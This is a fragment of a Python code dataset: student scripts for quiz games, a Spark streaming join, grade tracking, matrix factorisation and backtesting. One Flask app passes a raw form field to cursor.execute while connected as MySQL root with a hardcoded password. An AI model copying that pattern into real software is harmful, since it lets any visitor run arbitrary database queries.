'''加密py文件,并且放在加密py路径中'''\n destfile = os.path.join(\n config.information.get_crypt_txt_path(), txtname + 
'.bin')\n self.encryptfile(key, txtfile, destfile)\n\n def loadencrypttxtfile(self, key, txtname):\n '''载入加密的py文件'''\n epttxtfile = os.path.join(\n config.information.get_crypt_txt_path(), txtname + '.bin')\n return self.loadencryptfile(key, epttxtfile)\n\n\n","sub_path":"python/kits/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"104062135","text":"import pytest\nfrom lab_11.tasks.tools.calculator import (\n Calculator,\n CalculatorError,\n EmptyMemory,\n NotNumberArgument,\n WrongOperation,\n)\n\n@pytest.fixture(scope='function')\ndef calculator():\n return Calculator()\n\n@pytest.mark.parametrize(\n \"operator, arg1, arg2, expected\", [\n (\"+\", 1, 1, 2),\n (\"-\", 5, 2, 3),\n (\"*\", 10, 2, 20),\n (\"/\", 10, 2, 5),\n ('/', 2.2, 1.1, 2.0),\n ('*', complex(2, 3), complex(2, 3), complex(-5, 12)),\n ('+', complex(2, 3), 1, complex(3, 3))\n ]\n)\ndef test_run_operation(calculator, operator, arg1, arg2, expected):\n assert calculator.run(operator, arg1, arg2) == expected\n\n@pytest.mark.parametrize(\n \"operator, arg1, arg2, expected\", [\n (\"+\", 2, \"a\", NotNumberArgument),\n (\"+\", \"a\", 2, NotNumberArgument),\n (\"+\", \"a\", \"a\", NotNumberArgument),\n (\"^\", 2, 6, WrongOperation),\n (342, 1, 1, WrongOperation),\n (\"/\", 2, None, EmptyMemory),\n (\"/\", 2, 0, CalculatorError)\n ]\n)\ndef test_run_exception(calculator, operator, arg1, arg2, expected):\n with pytest.raises(expected):\n calculator.run(operator, arg1, arg2)\n\ndef test_run_memory(calculator):\n with pytest.raises(EmptyMemory):\n calculator.memory\n calculator.run('+', 1, 1)\n calculator.memorize()\n assert calculator.memory == 2\n assert calculator.in_memory() == print(f\"Zapamiętana wartość: 2\")\n calculator.clean_memory()\n with pytest.raises(EmptyMemory):\n calculator.memory\n calculator.in_memory()","sub_path":"lab_11/tasks/tests/tests_task1.py","file_name":"tests_task1.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"244158198","text":"count = 0\n\nwhile count <= 9999: \n\tcount = count + 1\n\n\tif (count%3==0 and count%5==0):\n\t\tprint (\"fizzbuzz\")\n\t\tcontinue\n\n\tif count%3 == 0:\n\t\tprint(\"fizz\")\n\t\tcontinue\n\n\tif count%5 == 0:\n\t\tprint (\"buzz\")\n\t\tcontinue\n\t\n\telse:\n\t\tprint(count)\n\n\n","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"135729175","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import from_json, to_json, col, unbase64, base64, split, expr\nfrom pyspark.sql.types import StructField, StructType, StringType, BooleanType, ArrayType, DateType\n# this is a manually created schema - before Spark 3.0.0, schema inference is not automatic\n# since we are not using the date or the amount in sql calculations, we are going\n# to cast them as strings\n# {\"truckNumber\":\"5169\",\"destination\":\"Florida\",\"milesFromShop\":505,\"odomoterReading\":50513}\nvehicleStatusSchema = StructType (\n [\n StructField(\"truckNumber\", StringType()),\n StructField(\"destination\", StringType()),\n StructField(\"milesFromShop\", StringType()),\n StructField(\"odometerReading\", StringType()) \n ] \n)\n\n# {\"reservationId\":\"1601485848310\",\"locationName\":\"New 
Mexico\",\"truckNumber\":\"3944\",\"status\":\"In\"}\nvehicleCheckinSchema = StructType (\n [\n StructField(\"reservationId\", StringType()),\n StructField(\"locationName\", StringType()),\n StructField(\"truckNumber\", StringType()),\n StructField(\"status\", StringType()) \n ]\n)\n\n# the source for this data pipeline is a kafka topic, defined below\nspark = SparkSession.builder.appName(\"vehicle-checkin\").getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\n\nvehicleStatusRawStreamingDF = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\",\"vehicle-status\") \\\n .option(\"startingOffsets\",\"earliest\")\\\n .load() \n\n#it is necessary for Kafka Data Frame to be readable, to cast each field from a binary to a string\nvehicleStatusStreamingDF = vehicleStatusRawStreamingDF.selectExpr(\"cast(key as string) key\", \"cast(value as string) value\")\n\n# this creates a temporary streaming view based on the streaming dataframe\n# it can later be queried with spark.sql, we will cover that in the next section \nvehicleStatusStreamingDF.withColumn(\"value\",from_json(\"value\",vehicleStatusSchema))\\\n .select(col('value.*')) \\\n .createOrReplaceTempView(\"VehicleStatus\")\n\n# Using spark.sql we can select any valid select statement from the spark view\nvehicleStatusSelectStarDF=spark.sql(\"select truckNumber as statusTruckNumber, destination, milesFromShop, odometerReading from VehicleStatus\")\n\nvehicleCheckinRawStreamingDF = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\",\"check-in\") \\\n .option(\"startingOffsets\",\"earliest\")\\\n .load() \n\n#it is necessary for Kafka Data Frame to be readable, to cast each field from a binary to a string\nvehicleCheckinStreamingDF = vehicleCheckinRawStreamingDF.selectExpr(\"cast(key as string) key\", \"cast(value as string) value\")\n\n# this creates a temporary streaming view based on the streaming dataframe\n# it can later be queried with spark.sql, we will cover that in the next section \nvehicleCheckinStreamingDF.withColumn(\"value\",from_json(\"value\",vehicleCheckinSchema))\\\n .select(col('value.*')) \\\n .createOrReplaceTempView(\"VehicleCheckin\")\n\n# Using spark.sql we can select any valid select statement from the spark view\nvehicleCheckinSelectStarDF=spark.sql(\"select reservationId, locationName, truckNumber as checkinTruckNumber, status from VehicleCheckin\")\n\n# Join the bank deposit and customer dataframes on the accountNumber fields\ncheckinStatusDF = vehicleStatusSelectStarDF.join(vehicleCheckinSelectStarDF, expr(\"\"\"\n statusTruckNumber = checkinTruckNumber\n\"\"\" \n))\n\n# this takes the stream and \"sinks\" it to the console as it is updated one message at a time:\n#. +-------------+------+--------------------+------------+--------------+\n#. |accountNumber|amount| dateAndTime|customerName|customerNumber|\n#. +-------------+------+--------------------+------------+--------------+\n#. | 335115395|142.17|Oct 6, 2020 1:59:...| Jacob Doshi| 335115395|\n#. | 335115395| 41.52|Oct 6, 2020 2:00:...| Jacob Doshi| 335115395|\n#. | 335115395| 261.8|Oct 6, 2020 2:01:...| Jacob Doshi| 335115395|\n#. 
+-------------+------+--------------------+------------+--------------+\n\ncheckinStatusDF.writeStream.outputMode(\"append\").format(\"console\").start().awaitTermination()\n\n","sub_path":"workspace_1/.ipynb_checkpoints/vehicle-checkin.solution-checkpoint.py","file_name":"vehicle-checkin.solution-checkpoint.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"416394549","text":"#-*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url\nfrom comparator.models import Car\n\ncars = Car.objects.all()\n\nurlpatterns = patterns('comparator.views',\n\turl(r'^$', 'home'),\n\turl(r'^car/cars$', 'display_cars'),\n\turl(r'^car/(?P\\d+)$', 'display_car'),\n\turl(r'^car/add$', 'add_car'),\n\turl(r'^car/edit/(?P\\d+)$', 'edit_car'),\n\turl(r'^car/compare$', 'compare'),\n\turl(r'^car/compare_cars/$', 'compare_cars'),\n)\n","sub_path":"comparator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483620968","text":"#Round1Math Game: asks a series of simple maths questions and scores answers, layers of complexity include speed, operator difficulty, memory element\n\nimport random\nimport operator\nimport time\nimport replit\nimport threading\n\n#Beginning - Greeting\nname = input(\"What is your name? \")\ntime.sleep(1)\n\n#Instructions\nprint(f\" \\n{name}, beat the timer and answer atleast 5 questions correctly\")\nprint('\\nL E V E L 1!!! ')\ntime.sleep(2)\nprint(\"Good Luck, I hope you know your math well\", name, \"!\")\n\nloss = 0\nscore = 0\ntime.sleep(2)\nprint(f\"Your score is {score}!\")\n\n#Dictionary of operators\noperators = { \n '+': operator.add, \n '-': operator.sub,\n 'x': operator.mul,\n #'/': operator.truediv,\n}\n#function that generates a random maths question and then checks to see whether user answer is equal to true answer\ndef random_question():\n num_1 = random.randint(1,10)\n num_2 = random.randint(1,10)\n\n operation = random.choice(list(operators.keys()))\n print('\\nWhat is '+ str(num_1) + operation + str(num_2) +'?')\n player_answer = input()\n answer = operators[operation](num_1,num_2)\n\n if float(player_answer) == answer:\n print('Correct!')\n global score\n score += 1 \n else:\n print('Incorrect!')\n global loss\n loss +=1\n \n print(f\" Your score is {score}!\")\n\ninput('\\nPress enter to continue')\n#10 second timer \ndef timer(): \n global my_timer\n my_timer = 10\n for x in range(10):\n my_timer = my_timer - 1\n time.sleep(1)\n print('Out of Time!')\n \n#allows two functions to run concurrently (random_question&timer)\ncountdown_thread = threading.Thread(target = timer)\ncountdown_thread.start()\n\n#ask random question as long as timer is non zero, win-lose scenario\nwhile my_timer > 0:\n random_question()\n print(f\"{my_timer} seconds left!\")\n if score > 4 and my_timer == 0:\n time.sleep(2)\n print(\"YOU WON! But wait...\")\n time.sleep(1.5)\n print(f\"So you know your math, lets hope you know your capitals. Time for the next game!\")\n time.sleep(5)\n input('\\nPress enter to continue')\n replit.clear()\nif score < 5:\n print('You loser!!!')\n quit()\n\n# *************Game 2 : Remember the Colours*************\n\n#Players have to remember the random colour sequence and input answers when prompted, three rounds; round one- 3 colours, round two- 7 colours, round three- 12 colours\nprint('\\nL E V E L 2!!! 
')\nprint(f\" \n{name}, your task is to try & remember the colours in order\")\n\nscore = 0\nloss = 0\ntime.sleep(2)\n\nprint(f\"\nYour score is {score}, win all 3 rounds to win the game \")\n\ntime.sleep(2)\n\nprint(\"\nI hope you've got a good memory \" + name + \"!\")\ninput('\nPress enter to continue')\n\n\n#Timer\ndef countdown(t):\n\n while t:\n mins, secs = divmod(t, 60)\n timer = '{:02d}:{:02d}'.format(mins, secs)\n print(timer, end=\"\r\")\n time.sleep(1)\n t -= 1\n\n print('Lets go!!')\n\n\n# 3 second countdown\ncountdown(int(3))\n\n\n#Flashes a list of colours in terminal one by one\ndef overprint(colour_list, t=1, char=\" \"):\n for i in range(len(colour_list)):\n time.sleep(t)\n print(\n '\r{0:{1}<{2}}'.format(colour_list[i], char,\n len(colour_list[i - 1])),\n end=\"\r\")\n time.sleep(t)\n print('\r{0:{1}<{2}}'.format(\" \", char, len(colour_list[-1])), end=\"\r\")\n\n\nColours = [\n 'red', 'blue', 'green', 'purple', 'yellow', 'orange', 'black', 'white',\n 'pink'\n]\n#Generate a random list of n colours from list Colours and feed into overprint. Checks to see if user recalls colours correctly for 3 rounds of increasing difficulty.\nfor i in range(1, 4):\n time.sleep(1)\n print('\n' 'Round', i)\n colours_shown_to_player = random.sample(Colours, 2 * i + 1)\n overprint(colours_shown_to_player)\n\n print('\nWhat colours were just shown to you?')\n user_answer = input()\n\n if user_answer.replace(',', ' ').lower().split(\n ) == colours_shown_to_player: #' '.join(round_answer):\n print('Correct!')\n score += 1\n else:\n print('Incorrect!')\n loss += 1\n\n print(f\"Your score is {score}\")\n\n#User can only win game if they win all 3 rounds\nif loss > 0:\n print('YOU LOSE! Try Again')\n input('\nPress enter to continue')\n replit.clear()\n\nelse:\n print('YOU WIN!! Please speak to Muhammed to claim your £1000 amazon voucher!')\n input('\nPress enter to continue')\n replit.clear()\n\n\n# *************Game 3 : Guess the Capitals*************\n\n#Greeting\n
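#Game flow: five correct answers (score > 4) win, while three wrong answers (loss > 2) end the game\n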
print(f\"\nL E V E L 3!!! I hope you know your capitals well {name}!\")\nprint(f\" \nAnswer 5 questions {name} to win this game!\")\n\nscore = 0\nprint(f\"Oh also, your score is {score} \" + name)\ninput('\nPress enter to continue')\n\nloss = 0\n\n#Dictionary with Countries & Cities\nCountries = {\n 'England': 'London',\n 'Spain': 'Madrid',\n 'Japan': 'Tokyo',\n 'China': 'Beijing',\n 'India': 'New Delhi',\n 'Nigeria': 'Abuja',\n 'Ireland': 'Dublin',\n 'Australia': 'Canberra',\n 'Turkey': 'Ankara',\n 'Sweden': 'Stockholm',\n 'Italy': 'Rome',\n 'Russia': 'Moscow',\n 'Egypt': 'Cairo',\n 'Syria': 'Damascus',\n 'South Africa': 'Pretoria',\n 'Gambia': 'Banjul',\n 'Brazil': 'Brasilia',\n 'Chile': 'Santiago',\n 'Canada': 'Ottawa',\n 'USA': 'Washington DC',\n 'Ghana': 'Accra',\n 'Rwanda': 'Kigali',\n 'Cameroon': 'Yaounde',\n 'Norway': 'Oslo',\n 'UAE': 'Abu Dhabi',\n 'Germany': 'Berlin',\n 'Israel': 'Jerusalem'\n}\n\n\n# Function will choose one random word from this list of countries\ndef capital_question():\n time.sleep(1)\n Random_Country = random.choice(list(Countries.keys()))\n print(f\"\nGuess the capital of {Random_Country}!\")\n user_answer = input()\n\n if str(user_answer) == Countries[Random_Country]:\n print('Correct!')\n global score\n score += 1\n else:\n print('Incorrect!')\n global loss\n loss += 1\n print(f\"Your score is {score}, you have {3 - loss} chance(s) left\")\n\n\n#Loop the whole game\nfor i in range(10):\n capital_question()\n if score > 4:\n print('YOU WIN!')\n input('\nPress enter to continue')\n replit.clear()\n break\n if loss > 2:\n print('YOU LOSE')\n input('\nPress enter to continue')\n replit.clear()\n break\n\n#Bonus Game - Rock Paper Scissors\n\n#Rock Paper Scissors\n\n#Greet the player and ask for their name.\n#The player must input rock paper or scissors\n#Make game randomly show rock paper or scissors\n\n#Options\n\n#Rock\n#If player puts rock and computer puts scissors player wins computer loses a point\n#If player puts rock and computer puts paper player loses a point and computer wins\n#If player puts rock and computer puts rock call a tie for that round\n\n#Scissors\n# If player puts scissors and computer puts rock player loses\n# If player puts scissors and computer puts paper player wins and computer loses\n# If player puts scissors and computer puts scissors call tie\n\n#Paper\n#If player puts paper and computer puts rock player wins round and computer loses\n# If player puts paper and computer puts scissors player loses and computer wins\n# If player puts paper and computer puts paper call tie\n\n#Once players score is >4 then player wins\n#Once players loss is >2 then player loses.\n#Loop the game again for 5 times!\n\nscore = 0\nloss = 0\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"479940489","text":"class Estudiante: \r\n def __init__ (self, nombre, apellido, edad, codigo, semestre, cedula, carrera, direccion, celular): \r\n self.nombre=nombre \r\n self.apellido=apellido \r\n self.edad=edad \r\n self.codigo=codigo \r\n self.semestre=semestre \r\n self.cedula=cedula \r\n self.carrera=carrera \r\n self.direccion=direccion \r\n self.celular=celular\r\n def listaAlumno (self, listadoAlumno):\r\n\r\n listadoAlumno[self.codigo]=[self.nombre, self.apellido, self.edad, self.codigo,\r\n self.semestre, self.cedula, self.carrera, self.direccion, self.celular]\r\n #print (listadoAlumno)\r\n return listadoAlumno\r\n\r\n
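 # simple accessor exposing the student's code to callers\r\n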
mostrarCod(self):\r\n        # La clase guarda el atributo 'codigo'; 'self.cod' no existe\r\n        return self.codigo\r\nclass Nivel:\r\n    def __init__(self, t, q1, q2, ex):\r\n        self.t=t\r\n        self.q1=q1\r\n        self.q2=q2\r\n        self.ex=ex\r\n    def listaNiv(self, listadoNiv, codigo):\r\n        listadoNiv[codigo]=[self.t, self.q1, self.q2, self.ex]\r\n        return listadoNiv\r\n    def visualizar(self, listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5):\r\n        # Un solo ciclo reemplaza los cinco bloques repetidos del original\r\n        for nivel, listado in enumerate([listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5], start=1):\r\n            print(\"Notas del Nivel {}: \".format(nivel))\r\n            print(listado)\r\n    def cambiar(self, listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5, cod):\r\n        niveles={\"1\": listadoNiv1, \"2\": listadoNiv2, \"3\": listadoNiv3, \"4\": listadoNiv4, \"5\": listadoNiv5}\r\n        print(\"Elija el nivel que desea cambiar\")\r\n        for n in range(1, 6):\r\n            print(\"{0}. Nivel {0}\".format(n))\r\n        opc=input()\r\n        print(\"Elija componente: \")\r\n        print(\"1. Taller\")\r\n        print(\"2. Quiz 1\")\r\n        print(\"3. Quiz 2\")\r\n        print(\"4. Examen\")\r\n        notaCambio=input()\r\n        nuevaNota=float(input(\"¿Que nota es?: \"))\r\n        # Un solo bloque reemplaza las cinco ramas identicas del original\r\n        if opc in niveles:\r\n            listado=niveles[opc]\r\n            l1=listado[cod]\r\n            if notaCambio in (\"1\", \"2\", \"3\", \"4\"):\r\n                l1[int(notaCambio)-1]=nuevaNota\r\n                listado[cod]=l1\r\n            print(listado)\r\n    def definitivaNivel(self, listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5, cod):\r\n        sumaTotal=0.0\r\n        for nivel, listado in enumerate([listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5], start=1):\r\n            notas=listado[cod]\r\n            suma=0.0\r\n            for c in range(0, 4):\r\n                suma=notas[c]+suma\r\n            print(\"Definitiva del nivel {}: \".format(nivel))\r\n            print(suma/4)\r\n            sumaTotal=sumaTotal+(suma/4)\r\n        sumaTotal=sumaTotal/5\r\n        return sumaTotal\r\n    def promedio(self, listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5, cod):\r\n        n1=listadoNiv1[cod]\r\n        n2=listadoNiv2[cod]\r\n        n3=listadoNiv3[cod]\r\n        n4=listadoNiv4[cod]\r\n        n5=listadoNiv5[cod]\r\n        ptaller=(n1[0]+n2[0]+n3[0]+n4[0]+n5[0])/5\r\n        pquiz1=(n1[1]+n2[1]+n3[1]+n4[1]+n5[1])/5\r\n        pquiz2=(n1[2]+n2[2]+n3[2]+n4[2]+n5[2])/5\r\n        pexamen=(n1[3]+n2[3]+n3[3]+n4[3]+n5[3])/5\r\n        pquiz=(pquiz1+pquiz2)/2\r\n        print(\"El promedio de los talleres es: \")\r\n        print(ptaller)\r\n        print(\"El promedio de los quices es: \")\r\n        print(pquiz)\r\n        print(\"El promedio de los examenes es: \")\r\n        print(pexamen)\r\n    def consulta(self, listadoAlumno, cod):\r\n        # Las etiquetas siguen el orden en que listaAlumno guarda los datos\r\n        estud=listadoAlumno[cod]\r\n        print(\"Nombre: \"+estud[0])\r\n        print(\"Apellido: \"+estud[1])\r\n        print(\"Edad: \"+str(estud[2]))\r\n        print(\"Codigo: \"+estud[3])\r\n        print(\"Semestre: \"+estud[4])\r\n        print(\"Cedula: \"+estud[5])\r\n        print(\"Carrera: \"+estud[6])\r\n        print(\"Direccion: \"+estud[7])\r\n        print(\"Celular: \"+estud[8])\r\n\r\nlistadoAlumno={}\r\nlistadoNiv1={}\r\nlistadoNiv2={}\r\nlistadoNiv3={}\r\nlistadoNiv4={}\r\nlistadoNiv5={}\r\nlistaCod=[]\r\ns=\"si\"\r\nwhile s==\"si\":\r\n    nombre=input(\"Ingrese el nombre: \")\r\n    apellido=input(\"Ingrese el apellido: \")\r\n    edad=int(input(\"Ingrese la edad: \"))\r\n    codigo=input(\"Ingrese el codigo: \")\r\n    cedula=input(\"Ingrese la cedula: \")\r\n    semestre=input(\"Ingrese el semestre: \")\r\n    carrera=input(\"Ingrese la carrera: \")\r\n    direccion=input(\"Ingrese la direccion: \")\r\n    celular=input(\"Ingrese el celular: \")\r\n    alumno=Estudiante(nombre, apellido, edad, codigo, semestre, cedula, carrera, direccion, celular)\r\n    listaCod.append(codigo)\r\n    listadoAlumno=alumno.listaAlumno(listadoAlumno)\r\n    # Pide las notas de los cinco niveles con un solo bloque; listaNiv actualiza cada diccionario en el lugar\r\n    for nivel, listado in enumerate([listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5], start=1):\r\n        print(\"----Nivel {}----\".format(nivel))\r\n        t=float(input(\"Taller: \"))\r\n        q1=float(input(\"Quiz 1: \"))\r\n        q2=float(input(\"Quiz 2: \"))\r\n        ex=float(input(\"Examen: \"))\r\n        nivNotas=Nivel(t, q1, q2, ex)\r\n        nivNotas.listaNiv(listado, codigo)\r\n    s=input(\"¿Agregar otro estudiante? 
si/no: \")\r\nprint(\"----------Menu----------\") \r\nprint(\"1. Visualizar informacion de los niveles. \") \r\nprint(\"2. Cambiar las notas de un nivel.\") \r\nprint(\"3. Calcular la nota definitiva de todos los niveles.\")\r\nprint(\"4. Calcular la nota definitiva del curso.\") \r\nprint(\"5. Calcular la nota promedio para talleres, quices y examenes.\") \r\nprint(\"6. Ver informacion de un estudiante.\") \r\nopc=input()\r\nif opc==\"1\":\r\n    nivNotas.visualizar(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5)\r\nelif opc==\"2\": \r\n    hacer=0 \r\n    while(hacer==0): \r\n        busqueda=input(\"Ingrese cod del estudiante al que desea cambiar notas: \") \r\n        if busqueda in listaCod:\r\n            hacer=2\r\n            nivNotas.cambiar(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n        else:\r\n            print(\"No se encuentra este cod. Inténtelo de nuevo\")\r\n            hacer=0\r\nelif opc==\"3\":\r\n    hacer=0\r\n    \r\n    while(hacer==0): \r\n        busqueda=input(\"Ingrese cod del estudiante al que desea consultar la definitiva por nivel: \") \r\n        if busqueda in listaCod:\r\n            hacer=2\r\n            nivNotas.definitivaNivel(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n        else:\r\n            print(\"No se encuentra este cod. Inténtelo de nuevo\")\r\n            hacer=0\r\nelif opc==\"4\":\r\n    hacer=0\r\n    \r\n    while(hacer==0): \r\n        busqueda=input(\"Ingrese cod del estudiante al que desea calcular definitiva del curso: \") \r\n        if busqueda in listaCod:\r\n            hacer=2\r\n            sumaTotal=nivNotas.definitivaNivel(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n            print(\"La definitiva de todo el curso es:\")\r\n            print(sumaTotal)\r\n        else:\r\n            print(\"No se encuentra este cod. Inténtelo de nuevo\")\r\n            hacer=0\r\nelif opc==\"5\":\r\n    hacer=0\r\n    \r\n    while(hacer==0): \r\n        busqueda=input(\"Ingrese cod del estudiante al que desea calcular promedio de talleres, quices y examenes: \") \r\n        if busqueda in listaCod:\r\n            hacer=2\r\n            nivNotas.promedio(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n            \r\n        else:\r\n            print(\"No se encuentra este cod. Inténtelo de nuevo\")\r\n            hacer=0\r\nelif opc==\"6\":\r\n    hacer=0\r\n    \r\n    while(hacer==0): \r\n        busqueda=input(\"Ingrese cod del estudiante que desea consultar: \") \r\n        if busqueda in listaCod:\r\n            hacer=2\r\n            nivNotas.consulta(listadoAlumno, busqueda)\r\n            \r\n        else:\r\n            print(\"No se encuentra este cod. 
Inténtelo de nuevo\")\r\n            hacer=0","sub_path":"tallercodigosegundaparte.py","file_name":"tallercodigosegundaparte.py","file_ext":"py","file_size_in_byte":11675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140699794","text":"# Solution set for CS 155 Set 6, 2016/2017\n# Authors: Fabian Boemer, Sid Murching, Suraj Nair\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom basicutils import train_model, get_err\nfrom basicvis import visualize, interesting_vis\nfrom collections import Counter\n\ndef main():\n    Y_train = np.loadtxt('data/train.txt').astype(int)\n    Y_test = np.loadtxt('data/test.txt').astype(int)\n\n    M = max(max(Y_train[:,0]), max(Y_test[:,0])).astype(int) # users\n    N = max(max(Y_train[:,1]), max(Y_test[:,1])).astype(int) # movies\n    print(\"Factorizing with M: \", M, \" users, N: \", N, \" movies.\")\n    K = 20\n\n    reg = 0.1\n    eta = 0.03 # learning rate\n    E_in = []\n    E_out = []\n\n    # Use to compute Ein and Eout\n    U, V, E_in = train_model(M, N, K, eta, reg, Y_train)\n    E_out = get_err(U, V, Y_test)\n    print('E_out (MSE): ', E_out)\n\n    # Apply SVD to V\n    A, s, B = np.linalg.svd(V)\n    # Use first 2 columns of A\n    A2 = A[:, :2]\n    U_projected = np.dot(A2.T, U.T)\n    V_projected = np.dot(A2.T, V).T\n    X = V_projected[:, 0]\n    Y = V_projected[:, 1]\n\n    visualize(X, Y, '5-1')\n    interesting_vis(X, Y, '5-1')\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"5-1.py","file_name":"5-1.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85091487","text":"from flask import Flask, render_template, jsonify, redirect, send_from_directory, request, url_for\nimport pymysql \n\nconn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='afterclasscalendar', charset='utf8')\napp = Flask(__name__)\ncursor = conn.cursor()\ncursor.execute(\"select * from 社團\")\n# fetch the first row of data\n# row_1 = cursor.fetchone()\nrow_n = cursor.fetchmany(169)\nahhggh = 'row_1'\nstructhhh = str(row_n) + \"\\n\"\n# print(structhhh)\norder = \"select * from 社團\"\n@app.route('/',methods=['GET','POST'])\ndef hello():\n    if(request.method == 'POST'):\n        order = request.form.get('select')\n        cursor.execute(order)\n        row_1 = cursor.fetchone()\n        strsql = str(row_1)\n        print(order)\n        return render_template('abc.html') + strsql\n    return render_template('abc.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n    cursor.execute(order)\n    # fetch the first row of data\n    # row_1 = cursor.fetchone()\n    row_n = cursor.fetchone()\n    ahhggh = 'row_1'\n    structhhh = str(row_n) \n    return structhhh\n\n\nif __name__ == '__main__':\n    app.debug = True\n    app.run(debug=False, host='140.134.79.128', port='40128')\n","sub_path":"python_保險.py","file_name":"python_保險.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96150818","text":"from backtesting import Backtest, Strategy\nfrom backtesting.lib import crossover\nimport talib as ta\nfrom backtesting.test import SMA, EURUSD\n\nimport pandas as pd\n\nfrom datetime import datetime\nfrom datetime import timedelta\nimport random\n\ndf = pd.read_csv('data/USDJPY1h.csv')\ndf = df.set_index(pd.to_datetime(df['Date'].apply(str) + ' ' + df['Timestamp']))\ndf = df[:1000]\n\n# df preprocessing\ndel df['Date']\ndel df['Timestamp']\ndf.columns = ['Open', 'High', 'Low', 'Close', 'Volume']\nopen = df[\"Open\"].values\nhigh = df[\"High\"].values\nlow 
= df[\"Low\"].values\nclose = df[\"Close\"].values\n\n\nclass SmaCross(Strategy):\n def init(self):\n Close = self.data.Close\n self.ma1 = self.I(SMA, Close, 10)\n self.ma2 = self.I(SMA, Close, 20)\n\n # example of using talib data\n self.sma = self.I(ta.SMA, self.data.Close, 20)\n self.atr = self.I(ta.ATR, self.data.High, self.data.Low, self.data.Close, 20)\n\n self.high20 = self.I(ta.MAX, self.data.High, 20)\n self.low20 = self.I(ta.MIN, self.data.Low, 20)\n\n self.sell_sl = self.data.Low + self.atr * 2\n self.buy_sl = self.data.High - self.atr * 2\n\n def next(self):\n pass\n # if crossover(self.ma1, self.ma2):\n # self.buy()\n # elif crossover(self.ma2, self.ma1):\n # self.sell()\n\n\n\n\n\nbt = Backtest(df, SmaCross,\n cash=10000, commission=.002, margin=0.01)\nbt.run()\nbt.plot()\n","sub_path":"back_test.py","file_name":"back_test.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"557626409","text":"from subprocess import call\nimport os, sys\nimport numpy as np\n\nRMAX=0.0100\nRMIN=0.0100 \nN=10000\nfor S in [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8] :\n LAMBDA=(1+S)/(1-S)\n for ETA in [0.25, 0.50, 0.75, 1.00] :\n BNAME=\"LAMBDA_{0:03.2f}-ETA_{1:03.2f}\".format(LAMBDA, ETA)\n GRANULO_FILE=\"INPUT\\/granulo-\"+BNAME+\".txt\"\n DIRNAME=BNAME\n print(\"Generating simul directory -> {}\".format(DIRNAME))\n call(\"cp -a base-simul/ {}\".format(DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_RMAX/{0}/' {1}/INPUT/prepro_conf.yaml\".format(RMAX, DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_RMIN/{0}/' {1}/INPUT/prepro_conf.yaml\".format(RMIN, DIRNAME), shell=True)\n print(\"Replace GRANULOMETRY_FILE with value -> {}\".format(GRANULO_FILE))\n call(\"sed -i.bck 's/REPLACE_GRANULOMETRY_FILE/{0}/' {1}/INPUT/prepro_conf.yaml\".format(GRANULO_FILE, DIRNAME), shell=True)\n FACTOR=3.5*LAMBDA\n NX = NY = int((N/FACTOR)**(1.0/3.0) + 1)\n NZ = int(FACTOR*NX + 1)\n call(\"sed -i.bck 's/REPLACE_NX/{0:d}/' {1}/INPUT/prepro_conf.yaml\".format(NX, DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_NY/{0:d}/' {1}/INPUT/prepro_conf.yaml\".format(NY, DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_NZ/{0:d}/' {1}/INPUT/prepro_conf.yaml\".format(NZ, DIRNAME), shell=True)\n\n 